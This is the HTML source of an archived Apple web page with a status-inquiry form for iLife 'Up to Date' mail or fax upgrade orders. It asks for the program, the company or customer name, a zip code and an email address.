<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Apple - Press Info - Search Results</title> <meta http-equiv="pics-label" content='(pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.apple.com" r (cz 1 lz 1 nz 1 oz 1 vz 1) "http://www.rsac.org/ratingsv01.html" l gen true for "http://www.apple.com" r (n 0 s 0 v 0 l 0))'> <meta http-equiv="Expires" content="Fri, 26 Mar 1999 23:59:59 GMT"> <meta http-equiv="pragma" content="no-cache"> <meta name="Author" content="Apple Inc."> <link rel="stylesheet" href="http://images.apple.com/global/styles/base.css" type="text/css" charset="utf-8"> <link rel="stylesheet" href="http://images.apple.com/global/nav/styles/nav.css" type="text/css" charset="utf-8"></head><body> <!--BEGIN NAV INCLUDE--> <script src="http://images.apple.com/global/nav/scripts/shortcuts.js" type="text/javascript" charset="utf-8"></script> <script type="text/javascript"> var searchSection = 'global'; var searchCountry = 'us'; </script><div id="globalheader"> <!--googleoff: all--> <ul id="globalnav"> <li id="gn-apple"><a href="http://www.apple.com/">Apple</a></li> <li id="gn-store"><a href="http://store.apple.com">Store</a></li> <li id="gn-mac"><a href="http://www.apple.com/mac/">Mac</a></li> <li id="gn-ipod"><a href="http://www.apple.com/ipod/">iPod</a></li> <li id="gn-iphone"><a href="http://www.apple.com/iphone/">iPhone</a></li> <li id="gn-ipad"><a href="http://www.apple.com/ipad/">iPad</a></li> <li id="gn-itunes"><a href="http://www.apple.com/itunes/">iTunes</a></li> <li id="gn-support"><a href="http://www.apple.com/support/">Support</a></li> </ul> <!--googleon: all--> <div id="globalsearch"> <form action="http://searchcgi.apple.com/cgi-bin/sp/nph-searchpre11.pl" method="post" class="search" id="g-search"> <div> <input type="hidden" value="utf-8" name="oe" id="search-oe"> <input type="hidden" 
value="p" name="access" id="search-access"> <input type="hidden" value="us_only" name="site" id="search-site"> <input type="hidden" value="lang_en" name="lr" id="search-lr"> <label for="sp-searchtext"><span class="prettyplaceholder">Search</span><input type="search" name="q" id="sp-searchtext" class="g-prettysearch applesearch" accesskey="s"></label> </div> </form> <div id="sp-results"><div class="inside"></div></div> </div></div><!-- END NAV BAR TABLE --><div id="container"><div id="header"> <h1>Status Inquiry</h1></div> <div id="main"><p>To check the status of your Mail or Fax upgrade, please complete the short form below. Information must be entered exactly as it was submitted on your order form.</p> <form method="post" action="http://wsidecar.apple.com/cgi-bin/upgrade_query/query.pl" onsubmit="return checkfields()"></div> <!-- eof top --> <label for="company"><strong>Select Program</strong></label> <p><SELECT NAME="promoid"> <OPTION VALUE = "Select Program" SELECTED>Select Program:</option> <OPTION VALUE = "iLife-thru10|19">iLife Up to Date</option> <OPTION VALUE = "iLife-from10|20">iLife Up to Date On or After 10/20</option> </SELECT></font></p><!--#ERR--> <hr size="1"> <div class="subcolumn1-2"> <label for="company"><strong>Company Name</strong> <span class="sosumi">(required)</span></label> <p><input name="company" type="text" size="30" maxlength="50" value="" class="required"></p> <p><strong>OR</strong></p> <label for="firstname"><strong>First Name</strong> <span class="sosumi">(required)</span></label> <p><input name="firstname" type="text" size="30" maxlength="30" value="" class="required"></p> <label for="lastname"><strong>Last Name</strong> <span class="sosumi">(required)</span></label> <p><input name="lastname" type="text" size="30" maxlength="30" value="" class="required"></p> </div> <div class="subcolumn2-2"> <label for="zip"><strong>Zip Code</strong> <span class="sosumi">(required)</span></label> <p><input name="zip" type="text" size="30" 
maxlength="11" value="" class="required"></p> <label for="phone"><strong>Email Address</strong></label> <p><input name="email" type="text" size="30" maxlength="50" value=""></p> </div> <div class="clearer">&nbsp;</div> <input type="submit" name="submit" value="&nbsp;&nbsp;Check Status&nbsp;&nbsp;" align="right"> <p class="sosumi">* Either company (if applicable) or customer name are required.</p> </form> <div class="clearer">&nbsp;</div></div> </div> <div id="globalfooter" class="gf-980"> <div id="breadcrumbs"> <a href="http://www.apple.com/" class="home">Home</a> <span>&gt;</span> Start </div><!--/breadcrumbs--> <p class="gf-buy">Shop the Apple Store <a href="http://www.apple.com/store/">online</a> (1-800-MY-APPLE), visit an <a href="http://www.apple.com/retail/">Apple Store</a> location, or find a <a href="/buy/locator/">reseller</a>.</p><p class="gf-links"><a href="http://www.apple.com/sitemap/">Site Map</a> | <a href="http://www.apple.com/hotnews/">Hot News</a> | <a href="http://www.apple.com/rss/">RSS Feeds</a> | <a href="http://www.apple.com/contact/">Contact Us</a></p><p class="gf-sosumi">Copyright © 2010 Apple Inc. All rights reserved. <a href="http://www.apple.com/legal/terms/site.html">Terms of Use</a> | <a href="http://www.apple.com/legal/privacy/">Privacy Policy</a></p> </div><!--/globalfooter--></body></html>